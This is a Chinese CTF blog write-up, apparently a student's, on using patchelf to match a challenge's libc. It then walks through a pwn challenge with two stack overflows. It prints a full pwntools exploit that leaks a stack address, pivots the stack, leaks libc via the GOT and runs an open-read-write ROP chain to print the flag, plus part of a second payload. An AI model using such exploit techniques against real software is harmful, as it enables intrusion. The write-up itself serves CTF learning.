
<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta charset="utf-8" />
    <title>patchelf使用和例题 | 纲的blog</title>
    <meta name="author" content="wgiegie" />
    <meta name="description" content="" />
    <meta name="keywords" content="Wgiegie" />
    <meta
        name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"
    />
    <link rel="icon" href="/images/avatar.jpg" />
    <link rel="preconnect" href="https://s4.zstatic.net" />
<script src="https://s4.zstatic.net/ajax/libs/vue/3.3.7/vue.global.prod.min.js"></script>
<link rel="stylesheet" href="https://s4.zstatic.net/ajax/libs/font-awesome/6.4.2/css/all.min.css" />
<link rel="preconnect" href="https://fonts.googleapis.cn" />
<link rel="preconnect" href="https://fonts.gstatic.cn" crossorigin />
<link
    rel="stylesheet"
    href="https://fonts.googleapis.cn/css2?family=Fira+Code:wght@400;500;600;700&family=Lexend:wght@400;500;600;700;800;900&family=Noto+Sans+SC:wght@400;500;600;700;800;900&display=swap"
/>
<script> const mixins = {}; </script>

<script src="https://polyfill.alicdn.com/v3/polyfill.min.js?features=default"></script>


<script src="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
<script src="https://s4.zstatic.net/ajax/libs/highlightjs-line-numbers.js/2.8.0/highlightjs-line-numbers.min.js"></script>
<link
    rel="stylesheet"
    href="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/styles/github.min.css"
/>
<script src="/js/lib/highlight.js"></script>



<script src="/js/lib/preview.js"></script>









<link rel="stylesheet" href="/css/main.css" />

<meta name="generator" content="Hexo 7.1.1"></head>
<body>
    <div id="layout">
        <transition name="fade">
            <div id="loading" v-show="loading">
                <div id="loading-circle">
                    <h2>LOADING</h2>
                    <p>加载过慢请开启缓存 浏览器默认开启</p>
                    <img src="/images/loading.gif" />
                </div>
            </div>
        </transition>
        <div id="menu" :class="{ hidden: hiddenMenu, 'menu-color': menuColor}">
    <nav id="desktop-menu">
        <a class="title" href="/">
            <span>纲的BLOG</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;About</span>
        </a>
        
        <a href="/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;Archives</span>
        </a>
        
        <a href="/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;Categories</span>
        </a>
        
        <a href="/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;Tags</span>
        </a>
        
    </nav>
    <nav id="mobile-menu">
        <div class="title" @click="showMenuItems = !showMenuItems">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;纲的BLOG</span>
        </div>
        <transition name="slide">
            <div class="items" v-show="showMenuItems">
                
                <a href="/">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-house fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                    </div>
                </a>
                
                <a href="/about">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-id-card fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">About</div>
                    </div>
                </a>
                
                <a href="/archives">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-box-archive fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Archives</div>
                    </div>
                </a>
                
                <a href="/categories">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-bookmark fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Categories</div>
                    </div>
                </a>
                
                <a href="/tags">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-tags fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Tags</div>
                    </div>
                </a>
                
            </div>
        </transition>
    </nav>
</div>
<transition name="fade">
    <div id="menu-curtain" @click="showMenuItems = !showMenuItems" v-show="showMenuItems"></div>
</transition>

        <div id="main" :class="loading ? 'into-enter-from': 'into-enter-active'">
            <div class="article">
    <div>
        <h1>patchelf使用和例题</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2024/4/26
        </span>
        
        <span class="category">
            <a href="/categories/pwn/">
                <span class="icon">
                    <i class="fa-solid fa-bookmark fa-fw"></i>
                </span>
                pwn
            </a>
        </span>
        
        
        <span class="tags">
            <span class="icon">
                <i class="fa-solid fa-tags fa-fw"></i>
            </span>
            
            
            <span class="tag">
                
                <a href="/tags/pwn%E5%B7%A5%E5%85%B7/" style="color: #ffa2c4">
                    pwn工具
                </a>
            </span>
            
        </span>
        
    </div>
    
    <div class="content" v-pre>
        <p>之前打了一下他们中国海洋大学的比赛，ε&#x3D;(´ο｀*)))唉太痛了，好几题都已将被打烂了，都没整出来，花了好几天才整出来一天，这一题还有的关键的地方是学长交的，太菜了，写这篇文件记录一下吧</p>
<p>写这篇文章的时候比赛还没有结束，那关于题目的wp等比赛结束了在发出来</p>
<img src="/2024/04/26/patchelf%E4%BD%BF%E7%94%A8%E5%92%8C%E4%BE%8B%E9%A2%98/image-20240427093653994.png" alt="image-20240427093653994" style="zoom:25%;">

<p><img src="/2024/04/26/patchelf%E4%BD%BF%E7%94%A8%E5%92%8C%E4%BE%8B%E9%A2%98/image-20240427093659333.png" alt="image-20240427093659333"></p>
<p><strong>有关于patchelf这个工具的使用</strong></p>
<p>在pwn题中，很多题目在远程的环境有很多种而这些不同的环境对pwn题的影响有很大，有的题目的编译环境与能不能打通有直接的关联，在本地的程序一般会直接使用本地的libc这会使我们在攻击本地与攻击远程有很大的出入，而patchelf这个工具的最大用处便是将远程的环境与本地环境不同的这个问题解决的很好用的工具。</p>
<p>一般远程的libc版本在题目中是会随可执行文件一起能被下载的，而这个工具的作用便是在于将本地的可执行文件（elf文件）的调用libc库从本地的固定的库转换为题目中提供的那个，是我们在攻击时，能保持本地与远程环境的一致，方便本地的攻击与调式。在本地打通后只要将链接的方式改为远程便可以</p>
<p>现在先介绍关于这个工具的使用：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">patchelf --<span class="built_in">set</span>-interpreter /home/giantbranch/Desktop/glibc-all-in-one/libs/<span class="number">2.31</span><span class="number">-0b</span>untu9<span class="number">.9</span>_amd64/ld<span class="number">-2.31</span>.so --<span class="built_in">set</span>-rpath /home/giantbranch/Desktop/glibc-all-in-one/libs/<span class="number">2.31</span><span class="number">-0u</span>buntu9<span class="number">.9</span>_amd64 <span class="title function_">login</span><span class="params">(文件名)</span></span><br><span class="line">    </span><br><span class="line">    patchelf --<span class="built_in">set</span>-interpreter libc文件名（包括路径） --<span class="built_in">set</span>-rpath libc文件所在的文件夹全名（包括路径） pwn（文件名） </span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">patchelf --<span class="built_in">set</span>-interpreter  /home/wzg/tools/glibc_all_in_one/glibc-<span class="built_in">all</span>-<span class="keyword">in</span>-one/libs/<span class="number">2.23</span>-0ubuntu11<span class="number">.3</span>_amd64/libc-<span class="number">2.23</span>.so（根据题目要求的libc版本来） --<span class="built_in">set</span>-rpath /home/wzg/tools/glibc_all_in_one/glibc-<span class="built_in">all</span>-<span class="keyword">in</span>-one/libs/<span class="number">2.23</span>-0ubuntu11<span class="number">.3</span>_amd64（文件夹名固定） pwn</span><br></pre></td></tr></table></figure>



<p>如果在远程的libc版本在本地的libc库中没有，将其拖入那个文件夹中便可以。</p>
<p>关于这个工具的下载一下是其在github上的位置，可以按文档上的介绍来做（中间可能会遇到一些问题，可以上网查一下，我是学长直接帮我下好的，我是菜狗）</p>
<p><a target="_blank" rel="noopener" href="https://github.com/NixOS/patchelf?tab=readme-ov-file">NixOS&#x2F;patchelf：一个修改 ELF 可执行文件的动态链接器和 RPATH 的小实用程序 — NixOS&#x2F;patchelf: A small utility to modify the dynamic linker and RPATH of ELF executables (github.com)</a></p>
<p><img src="/2024/04/26/patchelf%E4%BD%BF%E7%94%A8%E5%92%8C%E4%BE%8B%E9%A2%98/image-20240427093915945.png" alt="image-20240427093915945"></p>
<p>老规矩拿到题目先checksec一下</p>
<p><img src="/2024/04/26/patchelf%E4%BD%BF%E7%94%A8%E5%92%8C%E4%BE%8B%E9%A2%98/image-20240427094139743.png" alt="image-20240427094139743"></p>
<p>这里有一个问题在于在于这里的checksec比正常的多了最后一个，这个是我自己加上的，在拿到题目直接checksec只会有前5个，这第6个便是使用上文的patchelf工具将这个题目的libc链接库改到题目给的2.23版本后checksec的结果</p>
<p>在这里由于远程提供的是2.23的libc版本，所以这道题的编译环境也是这个版本，由于在不同版本中其对于不同漏洞的机制是不同的，所以有的漏洞在特定的版本上能打通在有的过高的版本就打不同，像这道题我写的脚本打本地就是打不通的，但一旦换到远程就可以打通。所以以后再遇到题目提供的libc版本与本地的版本并不同的时，最好在一开始就将文件的调用的libc版本从本地的换到与远程相同的版本。</p>
<p>这道题在我这里的更换命令如下,各位师傅可以更具自己的电脑进行更改。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">patchelf --<span class="built_in">set</span>-interpreter /home/wzg/tools/glibc_all_in_one/glibc-<span class="built_in">all</span>-<span class="keyword">in</span>-one/libs/<span class="number">2.23</span>-0ubuntu11<span class="number">.3</span>_amd64/ld-<span class="number">2.23</span>.so --<span class="built_in">set</span>-rpath  /home/wzg/tools/glibc_all_in_one/glibc-<span class="built_in">all</span>-<span class="keyword">in</span>-one/libs/<span class="number">2.23</span>-0ubuntu11<span class="number">.3</span>_amd64 bs</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>好那现在便将这个程序拖入到ida中</p>
<p>先看main函数：</p>
<p><img src="/2024/04/26/patchelf%E4%BD%BF%E7%94%A8%E5%92%8C%E4%BE%8B%E9%A2%98/image-20240427101015015.png" alt="image-20240427101015015"></p>
<p>就两个函数那就一个一个点进去看，先看第一个</p>
<p><img src="/2024/04/26/patchelf%E4%BD%BF%E7%94%A8%E5%92%8C%E4%BE%8B%E9%A2%98/image-20240427101105315.png" alt="image-20240427101105315"></p>
<p>那这样就很明显这道题是有沙箱保护的，那就再看沙箱有哪些保护</p>
<p><img src="/2024/04/26/patchelf%E4%BD%BF%E7%94%A8%E5%92%8C%E4%BE%8B%E9%A2%98/image-20240427101401242.png" alt="image-20240427101401242"></p>
<p> 这个沙箱保护有一个很扯的地方在于对于execve函数他并没有禁止，而是禁止了exit_group这个函数，所以好像理论上来说好像可以通过执行<code>system(/bin/sh)</code>拿到shell，但是我在之后发现并不能这样，他在执行system函数时会出现一些问题， 还是无法解决的那种，所以这道题还是得用orw的方法解决。</p>
<p>现在再看main函数中的另外一个函数内容</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">ssize_t func()</span><br><span class="line">&#123;</span><br><span class="line">  char buf[<span class="number">320</span>]; // [rsp+0h] [rbp-140h] BYREF</span><br><span class="line"></span><br><span class="line">  setbuf(stdin, 0LL);</span><br><span class="line">  setbuf(stdout, 0LL);</span><br><span class="line">  puts(<span class="string">&quot;please enter your content:&quot;</span>);</span><br><span class="line">  read(<span class="number">0</span>, buf, 0x150uLL);</span><br><span class="line">  printf(<span class="string">&quot;%s&quot;</span>, buf);</span><br><span class="line">  puts(<span class="string">&quot;please enter your content again:&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span> read(<span class="number">0</span>, buf, 0x150uLL);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>很明显了，这连续两个的栈溢出虽然溢出的比较小，但也足够进行栈迁移了，并且第一个地方还会把输入的都打印出来，在结合溢出便可以将ebp的值暴露出来，从而得到栈上的地址，然后在第二个栈溢出这里将执行权通过栈迁移将其迁移到栈上。</p>
<p>现在开始详细分析，</p>
<p>在第一个输入数据的那里可以进行一定的栈溢出，但程度很少，只够栈迁移的量，并且在之后的地方程序会把这里输入的都打印出来，虽然这个打印的没有格式化字符串漏洞，但是依然有一个漏洞。</p>
<p>这里用 <code>printf(&quot;%s&quot;, buf);</code>将输入到buf的数据打印出来。但这又个问题在于其对于结束打印的鉴定在于是否遇到\x00这个数据，如果遇到这个变会结束打印，反之如果不能遇到这个变会一直打印下去，知道遇到这个数据，于是我我们便可以直接向程序中注入0x140的长度的数据使其直接覆盖到ebq的位置，由于其在ebp的位置之前全部都被覆盖为垃圾数据，程序变回一直打连ebp所指的数据一同暴露，</p>
<p><img src="/2024/04/26/patchelf%E4%BD%BF%E7%94%A8%E5%92%8C%E4%BE%8B%E9%A2%98/image-20240427110159088.png" alt="image-20240427110159088"></p>
<p>在这里可以看到ebp所指的值也是一个栈上的地址，在找到程序输入的地址rsp所指的地方。</p>
<p><img src="/2024/04/26/patchelf%E4%BD%BF%E7%94%A8%E5%92%8C%E4%BE%8B%E9%A2%98/image-20240427110628309.png" alt="image-20240427110628309"></p>
<p>便可以找到这两个数据的距离差为多少，0x7fffffffde60-0x7fffffffdd10&#x3D;0x150</p>
<p>这样便可以知道栈的地址，在第二个输入的地方将程序执行权挟持到输入的数据的最开始执行我们输入的命令，</p>
<p>现在变可以在第二个输入的地方用puts函数将puts函数的got表的地址打印出来，然后使用read函数将orw的命令输入的一个bss段上的空地址，之后再将程序通过后栈迁移，迁移到存放orw的bss段地址上，执行orw将flag输出到屏幕上。这个是我对这道题的解法，有些麻烦，并且有的地方要整好多寄存器才行，就想在打开read函数时要将rdi的值代为0才能将我们输入的数据输入到bss段中（就这一个寄存器我调了2天才发现这个问题）。</p>
<p>后来因为我一开始并没有将这个题的链接库改到2.23的版本所以在自己做的时候，一直没打通问了学长，学长自己写了一个与我这种思路并不同的payload，之后将重点将那个payload，这里也将我自己的这种放上去，简单分析一下。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">io=process(<span class="string">&#x27;./bs&#x27;</span>)</span><br><span class="line"><span class="comment">#io = remote(&quot;competition.blue-whale.me&quot;,20082)</span></span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"><span class="comment">#gdb.attach(io,&#x27;b *0x400B0B&#x27;)</span></span><br><span class="line"><span class="comment">#pause()</span></span><br><span class="line"></span><br><span class="line">leave=<span class="number">0x400B09</span></span><br><span class="line">pop_rdi_ret=<span class="number">0x400b93</span></span><br><span class="line">read_plt=<span class="number">0x400830</span></span><br><span class="line">puts_plt=<span class="number">0x4007E0</span></span><br><span class="line">puts_got=<span class="number">0x601028</span></span><br><span class="line">read_got=<span class="number">0x601050</span></span><br><span class="line"></span><br><span class="line">buf=<span class="number">0x601680</span>//这里是bss段上的空地址</span><br><span class="line">ret=<span class="number">0x400799</span></span><br><span class="line">pop_rsi_pop_r15_ret=<span class="number">0x400b91</span></span><br><span class="line">pop_rbp_ret=<span class="number">0x4008d0</span></span><br><span class="line">pop_rbx_rbp_r12_r13_r14_r15_ret=<span class="number">0x400B8A</span> </span><br><span class="line">csu_init=<span class="number">0x400B70</span>//这个和上面一个都是__libc_csu_init中的全能寄存器修改器</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">io.sendafter(<span class="string">&#x27;content:\n&#x27;</span>,<span class="string">b&#x27;A&#x27;</span>*<span class="number">0x13f</span>+<span class="string">b&#x27;B&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">&#x27;B&#x27;</span>)</span><br><span class="line">ebp=u64(io.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span> (<span class="string">&#x27;ebp: &#x27;</span>,<span class="built_in">hex</span>(ebp))</span><br><span class="line"></span><br><span class="line">rsp=ebp-<span class="number">0x150</span>//rsp的值便是栈上数据的注入地址</span><br><span class="line"><span class="built_in">print</span> (<span class="string">&#x27;rsp: &#x27;</span>,<span class="built_in">hex</span>(rsp))</span><br><span class="line">tiao=ebp-<span class="number">0xb0</span>//在之后改read函数的寄存器是使用的那个init的跳转地址</span><br><span class="line"><span class="built_in">print</span> (<span class="string">&#x27;tiao: &#x27;</span>,<span class="built_in">hex</span>(tiao))</span><br><span class="line"></span><br><span class="line">payload=<span class="string">b&#x27;A&#x27;</span>*<span class="number">8</span>+p64(pop_rdi_ret)+p64(puts_got)+p64(ret)+p64(puts_plt)</span><br><span class="line">//打印libc地址</span><br><span class="line">payload+=p64(pop_rbx_rbp_r12_r13_r14_r15_ret)+p64(<span class="number">0</span>)+p64(<span class="number">1</span>)+p64(tiao)</span><br><span class="line">payload+=p64(<span class="number">0xc0</span>)+p64(buf)+p64(<span class="number">0</span>)+p64(csu_init)+<span class="string">b&#x27;A&#x27;</span>*<span class="number">0x38</span></span><br><span class="line">payload+=p64(ret)+p64(pop_rbp_ret)+p64(<span class="number">1</span>)+p64(read_plt)</span><br><span class="line">//将rdi的值设为<span class="number">0</span>，rsi设为bss段的空地址，rdx设为要读取的数据，rbp设为<span class="number">0</span>，然后调用read函数</span><br><span class="line">payload+=p64(pop_rbp_ret)+p64(buf)+p64(leave)</span><br><span class="line">//现将要跳转的地址赋给rbp然后调用leave便可以使程序跳转到那个地址</span><br><span class="line">payload=payload.ljust(<span class="number">0x140</span>,<span class="string">b&#x27;A&#x27;</span>)</span><br><span class="line">payload+=p64(rsp)+p64(leave)</span><br><span class="line">//将ebp覆盖为输入的地址，然后leave调到那</span><br><span class="line"></span><br><span class="line">time.sleep(<span class="number">2</span>)</span><br><span class="line">io.sendafter(<span class="string">&#x27;again:\n&#x27;</span>,payload)</span><br><span class="line"></span><br><span class="line">puts=u64(io.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span> (<span class="string">&#x27;puts: &#x27;</span>,<span class="built_in">hex</span>(puts))</span><br><span class="line">time.sleep(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">elo=ELF(<span class="string">&#x27;libc-2.23.so&#x27;</span>)</span><br><span class="line">open_libc=elo.symbols[<span class="string">&#x27;open&#x27;</span>] </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">puts_libc=elo.symbols[<span class="string">&#x27;puts&#x27;</span>]    </span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> (<span class="string">&#x27;puts_libc: &#x27;</span>,<span class="built_in">hex</span>(puts_libc))</span><br><span class="line">sys_libc=elo.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">bs = <span class="built_in">next</span>(elo.search(<span class="built_in">bytes</span>(<span class="string">&#x27;/bin/sh&#x27;</span>, <span class="string">&#x27;utf-8&#x27;</span>)))</span><br><span class="line"></span><br><span class="line">base_libc=puts-puts_libc</span><br><span class="line"><span class="built_in">print</span> (<span class="string">&#x27;base_libc: &#x27;</span>,<span class="built_in">hex</span>(base_libc))</span><br><span class="line">system=sys_libc+base_libc</span><br><span class="line">binsh=bs+base_libc</span><br><span class="line"><span class="built_in">open</span>=open_libc+base_libc</span><br><span class="line"><span class="built_in">print</span> (<span class="string">&#x27;system: &#x27;</span>,<span class="built_in">hex</span>(system))</span><br><span class="line"><span class="built_in">print</span> (<span class="string">&#x27;binsh: &#x27;</span>,<span class="built_in">hex</span>(binsh))</span><br><span class="line"><span class="comment">#io.recv()</span></span><br><span class="line">time.sleep(<span class="number">2</span>)</span><br><span class="line">buf_flag=<span class="number">0x601780</span>//在orw中放flag的空地址</span><br><span class="line"></span><br><span class="line">pop_rsi_pop_r15_ret=<span class="number">0x400b91</span></span><br><span class="line">pop_rdx_pop_r12_ret_libc=<span class="number">0x11f2e7</span></span><br><span class="line">pop_rdx_pop_r12_ret=pop_rdx_pop_r12_ret_libc+base_libc</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">pop_rdx_ret_libc=<span class="number">0x1b92</span></span><br><span class="line">pop_rdx_ret=pop_rdx_ret_libc+base_libc</span><br><span class="line"></span><br><span class="line"><span class="comment">#payload=b&#x27;A&#x27;*8+p64(pop_rdi_ret)+p64(binsh)+p64(system)</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">b&#x27;./flag\x00\x00&#x27;</span>+p64(pop_rsi_pop_r15_ret)+p64(<span class="number">0</span>)+p64(<span class="number">0</span>)</span><br><span class="line">payload+=p64(pop_rdx_ret)+p64(<span class="number">0</span>)</span><br><span class="line">payload+=p64(pop_rdi_ret)+p64(buf)+p64(pop_rbp_ret)+p64(<span class="number">1</span>)+p64(<span class="built_in">open</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload+=p64(pop_rdi_ret)+p64(<span class="number">3</span>)</span><br><span class="line">payload+=p64(pop_rdx_ret)+p64(<span class="number">0x30</span>)</span><br><span class="line">payload+=p64(pop_rsi_pop_r15_ret)+p64(buf_flag)+p64(<span class="number">0</span>)</span><br><span class="line">payload+=p64(pop_rbp_ret)+p64(<span class="number">1</span>)+p64(read_plt)</span><br><span class="line"></span><br><span class="line">payload+=p64(pop_rdi_ret)+p64(buf_flag)+p64(puts_plt)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">io.send(payload)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>以上这个便是我自己的payload，很明显有多有乱，虽然能打通但在真实的比赛中这个太多了，整完这题后面的就没什么时间了。所以必须要简化，现在来看看学长的payload</p>
<p><img src="/2024/04/26/patchelf%E4%BD%BF%E7%94%A8%E5%92%8C%E4%BE%8B%E9%A2%98/image-20240427114528647.png" alt="image-20240427114528647"></p>
<p>那现在来看看学长写的这个payload，先讲我对这个的理解。</p>
<p>在第一个溢出中我们可以通过溢出将ebp的值覆盖，然后还可以再溢出8个字节的位置，对于这剩下的一个位置我们可以选择像之前我的那个一样进行栈迁移，还一种便是回到程序中的某一个位置之后从这个位置执行下去，在这里学长选择得便是第二种，</p>
<p>那既然能改ebp的值那现在便要找一个可以用这个的地方，回到汇编语句中来看</p>
<p><img src="/2024/04/26/patchelf%E4%BD%BF%E7%94%A8%E5%92%8C%E4%BE%8B%E9%A2%98/image-20240427144335842.png" alt="image-20240427144335842"></p>
<p>仔细看在printf函数调用之前对于寄存器的管理，</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">lea     rax, [rbp+buf]</span><br><span class="line">mov     rsi, rax</span><br><span class="line">mov     edi, offset format ; <span class="string">&quot;%s&quot;</span></span><br><span class="line">mov     eax, <span class="number">0</span></span><br><span class="line">call    _printf</span><br></pre></td></tr></table></figure>

<ol>
<li><p>先将rbp的值加上buf，这里buf就是指buf这个变量的大小（-0x140），然后将rbp+（-0x140）的值赋给rax寄存器</p>
</li>
<li><p>将rax的值赋给rsi寄存器</p>
</li>
<li><p>将”%s”赋给edi，再将eax的值清零，</p>
</li>
<li><p>最后调用printf函数，</p>
<p><img src="/2024/04/26/patchelf%E4%BD%BF%E7%94%A8%E5%92%8C%E4%BE%8B%E9%A2%98/image-20240427153721575.png" alt="image-20240427153721575"></p>
<p>（关于这里为什么会是-0x140，我是不是很清楚，但点进buf显示的便是如此，同时在gdb中查看这一段地址也是如此，-0x140）</p>
<p><img src="/2024/04/26/patchelf%E4%BD%BF%E7%94%A8%E5%92%8C%E4%BE%8B%E9%A2%98/image-20240427153822619.png" alt="image-20240427153822619"></p>
</li>
</ol>
<p>详细来说就是在printf函数调用之前将edi赋值为%s，将rsi赋值为rbp-0x140的值，然后通过printf函数将rsi所指的rbp-0x140的地址的值打印出来，而我们在之前的时候可以通过栈溢出将ebp（ebp与rbp是同一个寄存器，不过ebp是rbp的后面一半的位，不过大多时候用不到不同的位置，故可以混用）的值覆盖，那这里我们便可以通过栈溢出将ebp的指覆盖为某个函数的got表的地址+0x140，然后再后面输入上面这个代码的地址，执行这段地址便可以将这个函数的got表的地址打印出来，然后便可以知道程序的libc基地址。</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">ayload = <span class="string">b&quot;A&quot;</span>*<span class="number">0x140</span> + p64(got +<span class="number">0x140</span>) + p64(<span class="number">0x400ACC</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">io.sendafter(<span class="string">&quot;please enter your content:&quot;</span>,payload)</span><br><span class="line"></span><br><span class="line">io.sendafter(<span class="string">&quot;please enter your content again:&quot;</span>,<span class="string">b&quot;AAA&quot;</span>)//第二个栈溢出随便输入几个数据过去就行</span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">b&quot;\n&quot;</span>)</span><br><span class="line">libcbase = u64(io.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&quot;\x00&quot;</span>)) </span><br><span class="line">libcbase=libcbase-libc.sym[<span class="string">&quot;__libc_start_main&quot;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;libcbse=================================================+&gt;&quot;</span>,<span class="built_in">hex</span>(libcbase))</span><br></pre></td></tr></table></figure>



<p>那这样程序的执行便回到printf函数这里，并且在之后还有一次栈溢出的机会，</p>
<p><strong>有一个很重要的事，自从我们将ebp的值覆盖为got+0x140的值后，一直执行的命令中并没有改变ebp的值的命令，故在后面包括read函数执行的时候对ebp的调用依然是不变的</strong></p>
<p>继续往后面执行执行到read的时候看看</p>
<p><img src="/2024/04/26/patchelf%E4%BD%BF%E7%94%A8%E5%92%8C%E4%BE%8B%E9%A2%98/%7BF322C214-C938-49FC-BE01-68C41DDF310D%7D-17142042888402.png" alt="{F322C214-C938-49FC-BE01-68C41DDF310D}"></p>
<p>由于ebp在前期的执行中并没有被改变，故执行到这里时依然是got+0x140的值，然后根据调用read函数前的命令，在执行read时rsi寄存器的值被改变为got的值，故这里的read函数读入的数据并不存放在栈上，而是存放在got的地址及其之后，并且ebp所指向的值为got+0x140。</p>
<p>然后便可以将orw通过read函数直接注入到got的地址上，然后注入的剩下垃圾数据到0x140，在将ebp指向的数据覆盖成got-8的地址，然后调用leave，指程序栈迁移到存放orw的地址，然后执行就可以拿到flag</p>
<p>全部的paylaod如下</p>
